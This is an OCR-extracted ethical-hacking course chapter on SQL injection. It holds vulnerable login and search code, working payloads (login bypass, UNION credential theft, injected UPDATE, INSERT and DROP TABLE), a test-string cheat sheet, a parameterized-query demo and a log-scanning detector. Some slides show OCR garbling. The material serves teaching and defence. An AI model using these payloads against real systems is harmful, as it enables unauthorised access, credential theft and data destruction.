  • 6. Ethical Hacking and Countermeasures SQL Injection I i Exam 312-50 Certified Ethical Hacker M o d u le F lo w To understand SQL injection and its impact on the network or system, let us begin with the basic concepts of SQL injection. SQL injection is a type of code injection method that exploits the safety vulnerabilities that occur in the database layer of an application. The vulnerabilities mostly occur due to the wrongly filtered input for string literal escape characters embedded in SQL statements from the users or user input that is not strongly typed and then suddenly executed without correcting the errors. Module 14 Page 1991 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 7. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker * SQL Injection Concepts Testing for SQL Injection ^ Advanced SQL Injection SQL Injection Tools Types of SQL Injection ) :^ ‫ן‬ ^ Evasion Techniques Blind SQL Injection y — Countermeasures v‫— ׳‬ SQL Injection Methodology This section introduces you to SQL injection and the threats and attacks associated with it. Module 14 Page 1992 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 8. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection cs Q SQL Injection is the 9 It is a fla w in W e b © Q M o st program m ers are most com m on w e b site A p p licatio n s and not a still not a w a re of this v u ln e ra b ility on the database or w eb threat Internet se rver issue © Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. 1 SQ L SQL In je c tio n SQL injection is a type of web application vulnerability where an attacker can manipulate and submit a SQL command to retrieve the database information. This type of attack mostly occurs when a web application executes by using the user-provided data without validating or encoding it. It can give access to sensitive information such as social security numbers, credit card numbers, or other financial data to the attacker and allows an attacker to create, read, update, alter, or delete data stored in the backend database. It is a flaw in web applications and not a database or web server issue. Most programmers are still not aware of this threat. Module 14 Page 1993 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 9. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker Scenario v o la tility s u b d u e d _ — « ■rt‫. רד 3 ־‬Q u 1j . v Albert Gonzalez, an indicted hacker stole 130 million credit and debit cards, the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on the companies' servers to intercept credit card data as it was being processed. http ://www. theregister.co. uk pro**— 1 B u s i n e s s ^ w o r l d —•■nomic upturn 0 p 1 1 . m l s t i c lid a s s e t s Copyright © b y EC-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. a S c e n a rio Albert Gonzalez, an indicted hacker stole 130 million credit and debit cards, performed the biggest identity theft case ever prosecuted in the United States. He used SQL injection attacks to install sniffer software on companies' servers to intercept credit card data as it was being processed. Module 14 Page 1994 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 10. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Is the M ost Prevalent Vulnerability in 2012 CEH SQL Injection Unknown DD0S D efacem ent Targeted Attack DNS Hijack Password Cracking Account Hijacking Java Vulnerability Other http://hackmageddon.com Copyright © b y EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. Source: http://hackmageddon.com According to http://hackmageddon.com. SQL injection is the most commonly used attack by the attacker to break the security of a web application. From the following statistics that were recorded in September 2012, it is clear that, SQL injection is the most serious and mostly used type of cyber-attack performed these days when compared to other attacks. Module 14 Page 1995 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 11. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Unknown DDoS Defacement Targeted Attack DNS Hijack Password C racking Account Hijacking Java Vulnerability Other FIGURE 14.1: SQL Injection Module 14 Page 1996 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 12. Ethical Hacking and Countermeasures SQL Injection Exam 312-50 Certified Ethical Hacker SQL Injection Threats CEH U rtifM IthKJl lUckM O Spoofing Identity C hanging Price Tam w per ith D atabase Records^ '/ •. ‫- ־׳‬ M odifying Records : Escalation of Privileges Voiding Machine's ^Critical Transactions D enial‫־‬of‫־‬Service on the Server Complete Disclosure of all Data on the System . D estruction of D ata Copyright © by EG-GtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited y SQL In je c tio n T h re a ts The following are the major threats of SQL injection: 9 Spoofing identity: Identity spoofing is a method followed by attackers. Here people are deceived into believing that a particular email or website has originated from the source which actually is not true. © Changing prices: One more of problem related to SQL injection is it can be used to modify data. Here the attackers enter into an online shopping portal and change the prices of product and then purchase the products at cheaper rates. Q Tamper with database records: The main data is completely damaged with data alteration; there is even the possibility of completely replacing the data or even deleting the data. Q Escalation of privileges: Once the system is hacked, the attacker seeks the high privileges used by administrative members and gains complete access to the system as well as the network. 9 Denial-of-service on the server: Denial-of-service on the server is an attack where users aren't able to access the system. More and more requests are sent to the server, which can't handle them. This results in a temporary halt in the services of the server. Module 14 Page 1997 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
• 13. - Complete disclosure of all the data on the system: Once the network is hacked, crucial and highly confidential data such as credit card numbers, employee details, and financial records are disclosed.
- Destruction of data: The attacker, after gaining complete control over the system, completely destroys the data, resulting in huge losses for the company.
- Voiding the system's critical transactions: An attacker can operate the system and halt all the crucial transactions performed by the system.
- Modifying the records: Attackers can modify the records of the company, which proves to be a major setback for the company's database management system.
• 14. What Is SQL Injection?

SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. SQL injection is a basic attack used either to gain unauthorized access to a database or to retrieve information directly from the database.

Structured Query Language (SQL) is basically a textual language that enables interaction with a database server. SQL commands such as INSERT, RETRIEVE, UPDATE, and DELETE are used to perform operations on the database. Programmers use these commands to manipulate data in the database server. SQL injection is defined as a technique that takes advantage of non-validated input vulnerabilities and injects SQL commands through a web application that are then executed by a back-end database. Programmers build SQL commands directly from client-supplied parameters, which makes it easy for attackers to inject commands. Attackers can then execute arbitrary SQL queries on the database server through the web application. Attackers use this technique either to gain unauthorized access to a database or to retrieve information directly from the database.
• 15. SQL Injection Attacks

Based on the application used and the way it processes user-supplied data, SQL injection can be used to perform the following types of attacks:

- Authentication bypass: Using this attack, an attacker logs onto an application without providing a valid user name and password and gains administrative privileges. The attacker enters the network without any authentic credentials and obtains the highest privilege in the network.
- Information disclosure: Using this attack, an attacker obtains sensitive information that is stored in the database. After unauthorized entry into the network, the attacker gets access to the sensitive data stored in the database.
- Compromised data integrity: An attacker uses this attack to deface a web page, insert malicious content into web pages, or alter the contents of a database. The attacker changes the main content of the website and also enters malicious content into it.
- Compromised availability of data: Attackers use this attack to delete the database information, or to delete log or audit information that is stored in the database.
- Remote code execution: This attack assists an attacker in compromising the host operating system. An attacker could modify, delete, or create data, or even create new accounts with full user rights on the servers that share files and folders.
• 16. How Web Applications Work

(Figure: the browser requests http://juggyboy.com/?id=6329&print=Y; the request travels over the Internet, through the firewall, to the web server, which passes it to the web application; the application makes OS system calls and sends SELECT * from news where id = 6329 to the DBMS, which returns the row ID 6329, Topic Tech, News CNN as output.)

A web application is a software program accessed by users over a network through a web browser. Web applications can be accessed only through a web browser (Internet Explorer, Mozilla Firefox, etc.). Users can access the application from any computer on the network. Web browsers also differ to some extent in how they handle web applications. Overall response time and speed depend on the connection speed.

Step 1: The user sends a request through the web browser, over the Internet, to the web server.
Step 2: The web server accepts the request and forwards the request sent by the user to the applicable web application server.
Step 3: The web application server performs the requested task.
Step 4: The web application accesses the database and responds to the web server.
Step 5: The web server responds back to the user as the transaction is complete.
Step 6: Finally, the information that the user requested appears on the user's monitor.
• 17. FIGURE 14.2: Working of Web Applications (the query SELECT * from news where id = 6329 returns the row ID 6329, Topic Tech, News CNN)
• 18. Server-side Technologies

Powerful server-side technologies like ASP.NET and database servers allow developers to create dynamic, data-driven websites with incredible ease. The power of ASP.NET and SQL can easily be exploited by attackers using SQL injection attacks. All relational databases, including SQL Server, Oracle, IBM DB2, and MySQL, are susceptible to SQL injection attacks. SQL injection attacks do not exploit a specific software vulnerability; instead they target websites that do not follow secure coding practices for accessing and manipulating data stored in a relational database.

Server-side technology is the server half of client/server technology. For business success, information alone is not enough; speed and efficiency are also needed, and server-side technology helps to smoothly access, deliver, store, and restore information. Server-side technologies include ASP, ASP.NET, ColdFusion, JSP, PHP, Python, and Ruby on Rails. Server-side technologies like ASP.NET and SQL can be easily exploited using SQL injection.
• 19. HTTP POST Request

http://juggyboy.com/logon.aspx?username=bart&password=simpson

An HTTP POST request creates a way of passing larger sets of data to the server. HTTP POST requests are ideal for communicating with an XML web service. These methods are designed for data submission and retrieval on a web server. When a user provides information in the Account Login form (here the user name bart and the password simpson) and clicks Submit, the browser submits a string to the web server that contains the user's credentials. This string is visible in the body of the HTTP or HTTPS POST request as:

    username=bart&password=simpson

SQL query at the database:

    select * from Users where (username = 'bart' and password = 'simpson');

The login form:

    <form action="/cgi-bin/login" method=post>
    Username: <input type=text name=username>
    Password: <input type=password name=password>
    <input type=submit value=Login>
    </form>
• 20. Example 1: Normal SQL Query

http://juggyboy.com/BadLogin.aspx

Here the term "query" is used for the commands. All the SQL code is written in the form of a query statement and then executed. Data operations performed with SQL queries include selecting data, inserting or updating data, and creating data objects such as databases and tables. Every query statement begins with a clause such as SELECT, UPDATE, CREATE, or DELETE.

SQL query example, server-side code (BadLogin.aspx.cs):

    private void cmdLogin_Click(object sender, System.EventArgs e)
    {
        string strCnx = "server=localhost;database=northwind;uid=sa;pwd=;";
        SqlConnection cnx = new SqlConnection(strCnx);
        cnx.Open();

        // This code is susceptible to SQL injection attacks.
        string strQry = "SELECT Count(*) FROM Users WHERE UserName='" +
            txtUser.Text + "' AND Password='" + txtPassword.Text + "'";
        int intRecs;
        SqlCommand cmd = new SqlCommand(strQry, cnx);
        intRecs = (int) cmd.ExecuteScalar();
        if (intRecs > 0)
        {
            FormsAuthentication.RedirectFromLoginPage(txtUser.Text, false);
        }
        else
        {
            lblMsg.Text = "Login attempt failed.";
        }
        cnx.Close();
    }

Constructed SQL query when the user enters Jason / Springfield in the web browser:

    SELECT Count(*) FROM Users WHERE UserName='Jason' AND Password='Springfield'
• 21. FIGURE 14.3: SQL Query Example (the BadLogin.aspx server-side code and its constructed query, as listed above)
• 22. Example 1: SQL Injection Query

http://juggyboy.com/BadLogin.aspx

Attacker launching SQL injection; the SQL query executed is:

    SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1 --' AND Password='Springfield'

The code after -- is now a comment.

The most common operation in SQL is the query, and it is performed with the declarative SELECT statement. The SELECT command retrieves data from one or more tables. SQL queries allow a user to describe the desired data and leave the DBMS (Database Management System) responsible for optimizing, planning, and performing the physical operations. A SQL query includes, after the SELECT keyword, a list of columns to be included in the final result.

If the information submitted by a browser to a web application is inserted into a database query without being properly checked, SQL injection can occur. A typical example is an HTML form that receives the information posted by the user and passes it to an Active Server Pages (ASP) script running on an IIS web server. The information passed is the user name and password, and these two data items are checked by querying a SQL Server database.

    username: Blah' or 1=1 --
    password: Springfield

The query executed is:

    SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1 --' AND Password='Springfield';
• 23. However, the ASP script builds the query from user data using the following line:

    query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"

(here username is Blah' or 1=1 -- and password is Springfield).

If the user name is a single-quote character (') the effective query becomes:

    SELECT * FROM users WHERE username = ''' AND password = '[Springfield]';

This is invalid SQL syntax and produces a SQL Server error message in the user's browser:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''.
    /login.asp, line 16

The quotation mark provided by the user has closed the first one, and the second generates an error because it is unclosed. At this point, to customize the behavior of a query, an attacker can begin injecting strings into it. The content following the double hyphens (--) is a Transact-SQL comment.

FIGURE 14.4: SQL Injection Query Example (the attacker enters Blah' or 1=1 -- as the user name and Springfield as the password; SQL query executed: SELECT Count(*) FROM Users WHERE UserName='Blah' or 1=1 --' AND Password='Springfield'; the code after -- is a comment)
• 24. Example 1: Code Analysis

Code analysis is the process of automated testing of the source code for the purpose of debugging before the final release of the software for sale or distribution.

- A user enters a user name and password that matches a record in the Users table.
- A dynamically generated SQL query is used to retrieve the number of matching rows.
- The user is then authenticated and redirected to the requested page.

    string strQry = "SELECT Count(*) FROM Users WHERE UserName='" +
        txtUser.Text + "' AND Password='" + txtPassword.Text + "'";

When the attacker enters blah' or 1=1 -- then the SQL query looks like:

    SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1 --' AND Password=''

Because a pair of hyphens designates the beginning of a comment in SQL, the query simply becomes:

    SELECT Count(*) FROM Users WHERE UserName='blah' Or 1=1
• 25. Example 2: BadProductList.aspx

Source: http://msdn.microsoft.com

http://juggyboy.com/BadProductList.aspx

This page displays products from the Northwind database and allows users to filter the resulting list of products using a textbox called txtFilter. Like the previous example (BadLogin.aspx), this code is vulnerable to SQL injection attacks: the executed SQL is constructed dynamically from a user-supplied input.

    private void cmdFilter_Click(object sender, System.EventArgs e)
    {
        dgrProducts.CurrentPageIndex = 0;
        bindDataGrid();
    }

    private void bindDataGrid()
    {
        dgrProducts.DataSource = createDataView();
        dgrProducts.DataBind();
    }

    private DataView createDataView()
    {
        string strCnx = "server=localhost;uid=sa;pwd=;database=northwind;";
        string strSQL = "SELECT ProductId, ProductName, " +
            "QuantityPerUnit, UnitPrice FROM Products";

        // This code is susceptible to SQL injection attacks.
        if (txtFilter.Text.Length > 0)
        {
            // Attack occurs here
            strSQL += " WHERE ProductName LIKE '" + txtFilter.Text + "'";
        }

        SqlConnection cnx = new SqlConnection(strCnx);
        SqlDataAdapter sda = new SqlDataAdapter(strSQL, cnx);
        DataTable dtProducts = new DataTable();
        sda.Fill(dtProducts);
        return dtProducts.DefaultView;
    }

Like the last example, the page is ripe for SQL injection attacks because the executed SQL is constructed dynamically from a user-entered value. This particular page is a hacker's paradise because it can be hijacked by the astute hacker to reveal secret information, change data in the database, damage the database records, and even create new database user accounts.

Most SQL-compliant databases, including SQL Server, store metadata in a series of system tables with names such as sysobjects, syscolumns, and sysindexes. This means that a hacker could use the system tables to ascertain schema information for a database to assist in the further compromise of the database. For example, the following text entered into the txtFilter textbox might be used to reveal the names of the user tables in the database:

    UNION SELECT id, name, '', 0 FROM sysobjects WHERE xtype = 'U' --

The UNION statement in particular is useful to a hacker because it allows him or her to splice the results of one query onto another. In this case, the hacker has spliced the names of the user tables in the database onto the original query of the Products table. The only trick is to match the number and data types of the columns to the original query. The previous query might reveal that a table named Users exists in the database. A second query could reveal the columns in the Users table.

• 26. Using this information, the hacker might enter the following into the txtFilter textbox:

    UNION SELECT 0, UserName, Password, 0 FROM Users --

Entering this query reveals the user names and passwords found in the Users table.

FIGURE 14.5: BadProductList.aspx (the createDataView code listing shown above)
• 27. Example 2: Attack Analysis

Many websites have a search box for users to search for data. If the application does not validate the data entered in the search box, attackers can use it to inject SQL. Suppose the value entered into the search box is:

    blah' UNION Select 0, username, password, 0 from users --

SQL query executed:

    SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products WHERE ProductName LIKE 'blah' UNION Select 0, username, password, 0 from users --

After executing the SQL query, the results show the user names and passwords.
• 28. FIGURE 14.6: Attack Analysis (the attacker enters blah' UNION Select 0, username, password, 0 from users -- into the JuggyBoyShop.com product search box, and user names and passwords are displayed)
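The two vulnerable queries from Examples 1 and 2 (BadLogin.aspx and BadProductList.aspx), rebuilt here as an added Python example that is not part of the module or the MSDN article: they run against an in-memory SQLite stand-in for the Northwind tables so the blah' or 1=1 -- and UNION inputs can be executed and then compared with parameterized queries that treat the same input as a plain string. The table rows, column types and function names are constructed assumptions.

```python
"""Added example (not the module's or MSDN's code): Examples 1 and 2 in
Python against SQLite, vulnerable string concatenation beside the
parameterized form. All table contents are constructed sample rows."""
import sqlite3


def make_db():
    """Constructed stand-in for the Northwind Users and Products tables."""
    cnx = sqlite3.connect(":memory:")
    cnx.executescript("""
        CREATE TABLE Users (UserName TEXT, Password TEXT);
        INSERT INTO Users VALUES ('Jason', 'Springfield');
        CREATE TABLE Products (ProductId INTEGER, ProductName TEXT,
                               QuantityPerUnit TEXT, UnitPrice REAL);
        INSERT INTO Products VALUES (1, 'Chai', '10 boxes x 20 bags', 18.0);
        INSERT INTO Products VALUES (2, 'Chang', '24 - 12 oz bottles', 19.0);
    """)
    return cnx


# --- Example 1: login check, as in cmdLogin_Click ---------------------------

def bad_login(cnx, user, pwd):
    """Vulnerable: the same string concatenation as BadLogin.aspx."""
    qry = ("SELECT Count(*) FROM Users WHERE UserName='" + user +
           "' AND Password='" + pwd + "'")
    return cnx.execute(qry).fetchone()[0] > 0


def good_login(cnx, user, pwd):
    """Hardened: the input is bound as a parameter and never parsed as SQL."""
    qry = "SELECT Count(*) FROM Users WHERE UserName=? AND Password=?"
    return cnx.execute(qry, (user, pwd)).fetchone()[0] > 0


# --- Example 2: product filter, as in createDataView ------------------------

def bad_product_filter(cnx, filt):
    """Vulnerable: WHERE clause built from txtFilter exactly as the page shows."""
    sql = "SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products"
    if len(filt) > 0:
        sql += " WHERE ProductName LIKE '" + filt + "'"   # attack occurs here
    return cnx.execute(sql).fetchall()


def good_product_filter(cnx, filt):
    """Hardened: parameter binding; a UNION inside the input is just a literal."""
    sql = "SELECT ProductId, ProductName, QuantityPerUnit, UnitPrice FROM Products"
    args = ()
    if len(filt) > 0:
        sql += " WHERE ProductName LIKE ?"
        args = (filt,)
    return cnx.execute(sql, args).fetchall()


if __name__ == "__main__":
    cnx = make_db()
    bypass = "blah' or 1=1 --"
    print("vulnerable login accepts tautology:", bad_login(cnx, bypass, "x"))    # True
    print("parameterized login accepts it:", good_login(cnx, bypass, "x"))      # False
    splice = "blah' UNION SELECT 0, UserName, Password, 0 FROM Users --"
    print("vulnerable filter returns:", bad_product_filter(cnx, splice))  # [(0, 'Jason', 'Springfield', 0)]
    print("parameterized filter returns:", good_product_filter(cnx, splice))  # []
```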
• 29. Example 3: Updating Table

To create the UPDATE command in the SQL query, the syntax is:

    UPDATE "table_name" SET "column_1" = [new value] WHERE {condition}

For example, say we currently have a table as follows:

Table Store_Information

    Store_Name    Sales    Date
    Sydney        $100     Aug-06-2012
    Melbourne     $200     Aug-07-2012
    Queensland    $400     Aug-08-2012
    Victoria      $800     Aug-09-2012

TABLE 14.1: Store Table

And we notice that the sales for Sydney on 08/06/2012 are actually $250 instead of $100, and that particular entry needs to be updated. To do so, we use the following SQL query:
• 30.     UPDATE Store_Information SET Sales = 250 WHERE Store_Name = "Sydney" AND Date = "08/06/2012"

The resulting table would look like this:

Table Store_Information

    Store_Name    Sales    Date
    Sydney        $250     Aug-06-2012
    Melbourne     $200     Aug-07-2012
    Queensland    $400     Aug-08-2012
    Victoria      $800     Aug-09-2012

TABLE 14.2: Store Table After Updating

Attacker launching SQL injection through the Forgot Password email address field of a vulnerable website (the site promises to send the password to the registered email address):

    blah'; UPDATE jb-customers SET jb-email = 'info@juggyboy.com' WHERE email ='jason@springfield.com'; --

SQL query executed:

    SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE jb-email = 'blah'; UPDATE jb-customers SET jb-email = 'info@juggyboy.com' WHERE email ='jason@springfield.com'; --';

FIGURE 14.7: SQL Injection Attack
• 31. Example 4: Adding New Records

The following example illustrates the process of adding new records to the table:

    INSERT INTO table_name (column1, column2, column3...) VALUES (value1, value2, value3...)

    Store_Name    Sales    Date
    Sydney        $250     Aug-06-2012
    Melbourne     $200     Aug-07-2012
    Queensland    $400     Aug-08-2012
    Victoria      $800     Aug-09-2012

TABLE 14.3: Store Table

    INSERT INTO table_name ("store_name", "sales", "date") VALUES ("Adelaide", "$1000", "08/10/2012")

Attacker launching SQL injection through the Forgot Password email address field of a vulnerable website:

    blah'; INSERT INTO jb-customers ('jb-email', 'jb-passwd', 'jb-login_id', 'jb-last_name') VALUES ('jason@springfield.com', 'hello', 'jason', 'jason springfield'); --

SQL query executed:

    SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE email = 'blah'; INSERT INTO jb-customers ('jb-email', 'jb-passwd', 'jb-login_id', 'jb-last_name') VALUES ('jason@springfield.com', 'hello', 'jason', 'jason springfield'); --';
• 32.     Store_Name    Sales    Date
    Sydney        $250     Aug-06-2012
    Melbourne     $200     Aug-07-2012
    Queensland    $400     Aug-08-2012
    Victoria      $800     Aug-09-2012
    Adelaide      $1000    Aug-10-2012

TABLE 14.4: Store Table After Adding New Record

FIGURE 14.8: SQL Injection Attack (the Forgot Password INSERT injection above and the query it produces)
• 33. Example 5: Identifying the Table Name

Attacker launching SQL injection through the Forgot Password email address field of a vulnerable website (you will need to guess table names here):

    blah' AND 1=(SELECT COUNT(*) FROM mytable); --

SQL query executed:

    SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM table WHERE jb-email = 'blah' AND 1=(SELECT COUNT(*) FROM mytable); --';

FIGURE 14.9: Identifying the Table Name
  • 34. Example 6: Deleting a Table

  Attacker launching SQL injection: the attacker enters the following into the Email Address field of the juggyboy.com "Forgot Password" form:

    blah'; DROP TABLE Creditcard; --

  SQL query executed by the SQL injection vulnerable website:

    SELECT jb-email, jb-passwd, jb-login_id, jb-last_name FROM members WHERE jb-email = 'blah'; DROP TABLE Creditcard; --';

  FIGURE 14.10: Deleting Table
  • 35. Module Flow

  So far, we have discussed various concepts of SQL injection. Now we will discuss how to test for SQL injection. SQL injection attacks are attacks on web applications that rely on databases as their backend to handle and produce data. Here attackers modify the web application's input and try to inject their own SQL commands into the queries the application issues to the database.

    - SQL Injection Concepts
    - Testing for SQL Injection
    - Types of SQL Injection
    - Blind SQL Injection
    - SQL Injection Methodology
    - Advanced SQL Injection
    - SQL Injection Tools
    - Evasion Techniques
    - Countermeasures
  • 36. This section focuses on SQL injection attack characteristics and their detection.
  • 37. SQL Injection Detection

  The following are the various steps to be followed to identify SQL injections.

  Step 1: Check if the web application connects to a Database Server in order to access some data.
  Step 2: List all input fields, hidden fields, and post requests whose values could be used in crafting a SQL query.
  Step 3: Attempt to inject codes into the input fields to generate an error.
  Step 4: Try to insert a string value where a number is expected in the input field.
  Step 5: The UNION operator is used in SQL injections to join a query to the original query (it combines the result sets of two or more SELECT statements).
  Step 6: Detailed error messages provide a wealth of information to an attacker in order to execute SQL injection.
  • 38. SQL Injection Error Messages

  The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request. There are even chances of automated exploits based on the different error messages generated by the database server. These are examples of SQL injection attacks based on error messages:

  Attempt to inject codes into the input fields to generate an error: a single quote ('), a semicolon (;), comments (--), AND, and OR.

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
    /shopping/buy.aspx, line 52

  Try to insert a string value where a number is expected in the input field:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'test' to a column of data type int.
    /visa/credit.aspx, line 17

  Note: If applications do not provide detailed error messages and return a simple '500 Server Error' or a custom error page, then attempt blind injection techniques.
  • 39. SQL Injection Attack Characters

  The following is a list of characters used by the attacker for SQL injection attacks:

    Character                 Function
    ' or "                    Character string indicators
    -- or #                   Single-line comment
    /* */                     Multiple-line comment
    +                         Addition, concatenate (or space in url)
    ||                        (Double pipe) concatenate
    %                         Wildcard attribute indicator
    ?Param1=foo&Param2=bar    URL Parameters
    PRINT                     Useful as non-transactional command
    @variable                 Local variable
    @@variable                Global variable
    waitfor delay '0:0:10'    Time delay
    @@version                 Displays SQL server version
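  The characters and constructs in the table above are also what a defender looks for in request logs. The following is an added example written for this page (not code from the course or from EC-Council): a small signature scanner that URL-decodes the query string of each access-log line and reports which constructs it contains. The log format, client addresses, paths and the probe values are constructed for the demonstration; the rule set is deliberately narrow, so a lone single quote (as in a legitimate name such as O'Brien) is not reported on its own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines: client_ip "METHOD path" status.
# The query strings reuse the probe constructs described in the module.
SAMPLE_LOG = [
    '10.0.0.5 "GET /page.aspx?id=123" 200',
    '10.0.0.7 "GET /page.aspx?id=1%27+OR+%271%27%3D%271" 200',
    '10.0.0.7 "GET /page.aspx?id=1+AND+1%3D1--" 200',
    '10.0.0.7 "GET /page.aspx?id=1%27+UNION+SELECT+ALL+1%2C%40%40version%2C3%2C4--" 200',
    '10.0.0.9 "GET /search.aspx?q=O%27Brien" 200',
    '10.0.0.7 "GET /page.aspx?id=1%3B+WAITFOR+DELAY+%270%3A0%3A10%27--" 200',
    '10.0.0.4 "GET /buy.aspx?item=5+ORDER+BY+1000" 500',
    '10.0.0.7 "GET /buy.aspx?item=1%27%3B+DROP+TABLE+Creditcard%3B--" 200',
]

# Each rule is (name, pattern) and is applied to the URL-decoded query string.
RULES = [
    ("comment", re.compile(r"--|#|/\*")),                                  # -- # /*
    ("tautology", re.compile(r"\b(?:and|or)\s+'?(\w+)'?\s*=\s*'?\1'?", re.I)),  # OR '1'='1, AND 1=1
    ("union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("time_delay", re.compile(r"\bwaitfor\s+delay\b|\bbenchmark\s*\(", re.I)),
    ("global_var", re.compile(r"@@\w+")),                                 # @@version and friends
    ("order_by_probe", re.compile(r"\border\s+by\s+\d{3,}", re.I)),       # ORDER BY 1000 column probing
    ("stacked", re.compile(r";\s*(?:drop|insert|delete|update|exec)\b", re.I)),
]

LOG_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+)" (\d{3})$')


def classify_query(query):
    """Return the names of the rules that match a (still URL-encoded) query string."""
    decoded = unquote_plus(query)
    return [name for name, pattern in RULES if pattern.search(decoded)]


def scan_log(lines):
    """Return (client_ip, path, status, rule_names) for every line that trips a rule."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # constructed format only; other lines are ignored
        ip, path, status = match.groups()
        query = path.split("?", 1)[1] if "?" in path else ""
        hits = classify_query(query)
        if hits:
            findings.append((ip, path, int(status), hits))
    return findings


if __name__ == "__main__":
    for ip, path, status, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {path} -> {', '.join(hits)}")
```

  In practice the rule names would feed a SIEM or WAF alert; the point of the example is that a single rule rarely suffices, and that a request carrying both a comment sequence and a tautology or UNION is a far stronger signal than either alone.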
  • 40. Additional Methods to Detect SQL Injection

  SQL injection can be detected with the help of the following additional methods:

  Function Testing
  This testing falls within the scope of black box testing, and as such, should require no knowledge of the inner design of the code or logic.

  Fuzzing Testing
  Fuzz testing is an adaptive SQL injection testing technique used to discover coding errors by inputting a massive amount of random data and observing the changes in the output (or crashes of the web application).

  Static/Dynamic Testing
  Static/dynamic testing is the manual analysis of the web application source code.

  Example of Function Testing:

    http://juggyboy/?parameter=123
    http://juggyboy/?parameter=1'
  • 41. (continued)
    http://juggyboy/?parameter=1'#
    http://juggyboy/?parameter=1"
    http://juggyboy/?parameter=1 AND 1=1--
    http://juggyboy/?parameter=1'--
    http://juggyboy/?parameter=1 AND 1=2--
    http://juggyboy/?parameter=1'/*
    http://juggyboy/?parameter=1' AND '1'='1
    http://juggyboy/?parameter=1 order by 1000
  • 42. SQL Injection Black Box Pen Testing

  In black box testing, the pen tester doesn't need to possess any knowledge about the network or the system to be tested. The first job of the tester is to find out the location and system infrastructure. The tester tries to identify the vulnerabilities of web applications from the attacker's perspective. Use special characters, white space, SQL keywords, oversized requests, etc. to determine the various conditions of the web application. The following are the various issues related to SQL injection black box penetration testing:

  Detecting SQL Injection Issues
  Send single quotes as the input data to catch instances where the user input is not sanitized. Send double quotes as the input data to catch instances where the user input is not sanitized.

  Detecting Input Sanitization
  Use the right square bracket (the ] character) as the input data to catch instances where the user input is used as part of a SQL identifier without any input sanitization.

  Detecting SQL Modification
  Send long strings of single quote characters (or right square brackets or double quotes). These max out the return values from REPLACE and QUOTENAME functions and might truncate the command variable used to hold the SQL statement.

  • 43. Detecting Truncation Issues
  Send long strings of junk data, just as you would send strings to detect buffer overruns; this action might throw SQL errors on the page.
  • 44. Testing for SQL Injection

  Some of the testing strings with variations used in the database handling commonly bypass the authentication mechanism. You can use this cheat sheet to test for SQL injection:

  Testing string variations (quoted string context):
    ' or '1'='1
    value' or '1'='2
    1' and '1'='2
    1' or 'ab'='a'+'b
    1' or 'ab'='a' 'b
    1' or 'ab'='a'||'b
    ' or '1'='1'--
    ' and '1'='2'--
    '; drop table users--
    ';[SQL Statement];--
    ';[SQL Statement];#
    admin'--
    admin'#

  Testing string variations (quoted string inside parentheses):
    1') or ('1'='1
    value') or ('1'='2
    1') and ('1'='2
    1') or ('ab'='a'+'b
    1') or ('ab'='a' 'b
    1') or ('ab'='a'||'b
    ') or '1'='1'--
    ') and '1'='2'--
    ');[SQL Statement];--
    ');[SQL Statement];#
    admin')--
    admin')#

  Testing string variations (numeric context):
    1 or 1=1
    1 or 1=1--
    value or 1=2
    1 and 1=2
    1--
    1+1
    3-1
    value+0
    1 or 'ab'='a'+'b'
    1 or 'ab'='a' 'b'
    1 or 'ab'='a'||'b'
    -1 and 1=2--
    ;[SQL Statement];--
    ;[SQL Statement];#

  Testing string variations (numeric context inside parentheses):
    1) or 1=1--
    1) or (1=1
    value) or (1=2
    1) and (1=2
    1) or ('ab'='a'+'b'
    1) or ('ab'='a' 'b'
    1) or ('ab'='a'||'b'
    -1) and 1=2--
    );[SQL Statement];--
